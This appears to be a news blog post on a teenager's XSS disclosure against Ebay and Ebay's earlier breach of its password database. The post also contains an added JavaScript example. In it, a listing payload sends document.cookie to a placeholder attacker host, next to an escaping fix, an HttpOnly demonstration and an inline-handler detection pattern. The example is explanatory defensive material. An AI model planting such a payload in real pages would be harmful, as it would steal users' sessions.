College Student Discovers a Second Ebay Security Flaw

Just a few days after a flaw that compromised millions of user accounts came to light, a 19-year-old British college student found another flaw in Ebay's website. It's not as bad as the one that forced pretty much everybody to change their Ebay passwords. But it's not good, either.

The second vulnerability affects the way Ebay handles code and markup that doesn't come from Ebay itself, say, the Javascript and HTML that makes an auction listing look so pretty. This is the class of bug known as cross-site scripting (XSS). Said teenager, Jordan Lee Jones, says the flaw could let a hacker inject a page with malicious code that would steal a user's cookies. If the session cookie can be read by script in the page, that, in turn, gives the hacker the opportunity to hijack the account without ever knowing the password.
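To make the mechanism concrete, here is an added example, not Ebay's code and not the specific flaw Jones reported: a listing description that is concatenated straight into page HTML carries a payload that ships `document.cookie` to a collection server, the same template with HTML output encoding neutralises it, and the `HttpOnly` cookie attribute keeps the session cookie out of reach of script even when an injection slips through. The listing text, the cookie values and the `attacker.example` host are constructed placeholders.

```javascript
// Added example: an XSS payload in an auction listing, the vulnerable and the
// escaped rendering, and why HttpOnly limits the damage. Everything here is
// constructed for illustration; none of it is Ebay's code.

// Untrusted input, as a seller might submit it. Constructed sample: the
// onerror handler beacons the victim's cookies to a placeholder host.
const maliciousDescription =
  'Mint condition! <img src="x" onerror="new Image().src=' +
  "'https://attacker.example/c?'+encodeURIComponent(document.cookie)\">";

// Vulnerable: untrusted text is interpolated directly into page HTML, so the
// browser parses the seller's <img> tag and runs its event handler.
function renderListingVulnerable(description) {
  return `<div class="listing">${description}</div>`;
}

// Hardened: HTML-encode the five significant characters before interpolation,
// so the payload is displayed as text instead of parsed as markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}
function renderListingSafe(description) {
  return `<div class="listing">${escapeHtml(description)}</div>`;
}

// Crude stand-in for the browser's parser: does the output contain a tag with
// an inline event handler (on*=) that the template itself never emits?
const INLINE_HANDLER = /<\w+[^>]*\son\w+\s*=/i;
function containsInlineHandler(html) {
  return INLINE_HANDLER.test(html);
}

// Server side: the Set-Cookie header for the session. With HttpOnly the cookie
// is still sent on every request but is invisible to document.cookie.
function sessionCookieHeader(sessionId, { httpOnly }) {
  const attrs = ['Path=/', 'Secure', 'SameSite=Lax'];
  if (httpOnly) attrs.push('HttpOnly');
  return `sid=${sessionId}; ${attrs.join('; ')}`;
}

// Simulates what document.cookie exposes to an injected script: the
// name=value pairs of every cookie that is not marked HttpOnly.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter(h => !/;\s*HttpOnly\b/i.test(h))
    .map(h => h.split(';')[0])
    .join('; ');
}

// Stand-alone run: show both renderings and what a stolen cookie would contain.
console.log('vulnerable:', renderListingVulnerable(maliciousDescription));
console.log('escaped:   ', renderListingSafe(maliciousDescription));
console.log('exposed without HttpOnly:',
  scriptVisibleCookies([sessionCookieHeader('s3cr3t', { httpOnly: false })]));
console.log('exposed with HttpOnly:   ',
  JSON.stringify(scriptVisibleCookies([sessionCookieHeader('s3cr3t', { httpOnly: true })])));
```

Output encoding at the point where untrusted text meets HTML is the actual fix; `HttpOnly` is defence in depth that turns a cookie-theft XSS into a less convenient one (the attacker can still act as the user from inside the page while it is open, but cannot carry the session away). Note that encoding for an HTML text context is not enough if the value lands in a script block, a URL or an attribute that is itself parsed as code; each context needs its own encoder.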

Jones apparently contacted Ebay on Friday about this second flaw, but when he still hadn't heard back from them, he went ahead and published details on his blog on Monday. "Ebay should be on top of their stuff," he told PC World soon thereafter. At the very least, Ebay should pay attention to the white hat hackers who are trying to help them.

If you're wondering what you can do about this new flaw, the answer is unfortunately: not much. It's on Ebay to fix the vulnerability in its code, and as long as you changed your password last week, you should be okay. On a related note, a new statistic just cited by security researchers says that about 50 percent of Americans have been hacked in the last 12 months. So get used to it. [PC World]

You Need to Change Your Ebay Password Right Now

On Wednesday, Ebay will ask all users to change their passwords due to a massive cyberattack that hit the encrypted password database. The company says that no financial data was compromised, and that there's no evidence of unauthorized user activity. Either way, you can change your Ebay password right here.

So how did something like this happen to one of the biggest websites on the planet? A website that's responsible for hundreds of billions of dollars' worth of transactions every year? Well, the details remain vague, but Ebay says the hackers compromised "a small number of employee log-in credentials, allowing unauthorized access to eBay's corporate network." From there, they reached the database holding countless Ebay user accounts.

It's unclear whether Ebay knew about the security weakness before the attack. (Target knew about its flaw a few months ago, when a data breach affected 110 million customers and probably made you get a new debit card.) Ebay did say that the breach happened between late February and early March, though the company only detected it two weeks ago. Why it waited so long to tell users that their accounts were compromised is also unclear.

But again, according to Ebay's press release, nobody touched your money this time. All they got was every "eBay customers' name, encrypted password, email address, physical address, phone number and date of birth." Holy crap, that's a lot of personal information. It's easy enough to change your password. It's a lot harder to change your name, physical address, phone number, and date of birth, and that data is exactly what a phishing or account-recovery scam needs. [Ebay]

Note: As far as we know, the breach did not affect PayPal. You should still change your PayPal password, though, because why the heck not? Your money is in there, and you should keep it safe.